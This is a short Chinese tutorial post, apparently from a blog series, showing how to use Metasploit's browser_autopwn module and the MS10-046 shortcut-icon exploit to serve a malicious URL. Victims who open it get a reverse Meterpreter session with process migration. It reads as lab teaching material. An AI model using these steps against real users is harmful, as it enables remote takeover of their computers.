Metasploit(六)客户端漏洞

浏览器漏洞攻击

1.启动msfconsole,输入use auxiliary/server/browser_autopwn

2.可以通过show options查看需要设置的信息

3.设置参数

set LHOST <攻击主机ip>

set SRVHOST <本地ip>

setSRVPORT 80

点击run

该模块有个恶意url,即图上最后的using url

被攻击对象的系统上打开该url后,会发送一个反向连接给攻击者的系统,可以看到上图反向链接被建立了,能看到进程被迁移

 可以通过任务管理器看到进程有被迁移

输入sessions可以查看meterpreter会话的,通过sessions -i <id>就可以选中

之后就可以查看被攻击主机的所有信息了

ie快捷方式图标漏洞攻击

使用exploit/windows/browser/ms10_046_shortcut_icon_dllloader,进入该模块

设置主机IP和端口

被攻击主机输入这个url

此时,可以就被完全控制,输入sessions,可以查看进程

选择sessions,就可以进入查看详细

如图,可以进行一些别的操作,如获取网络信息等等

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值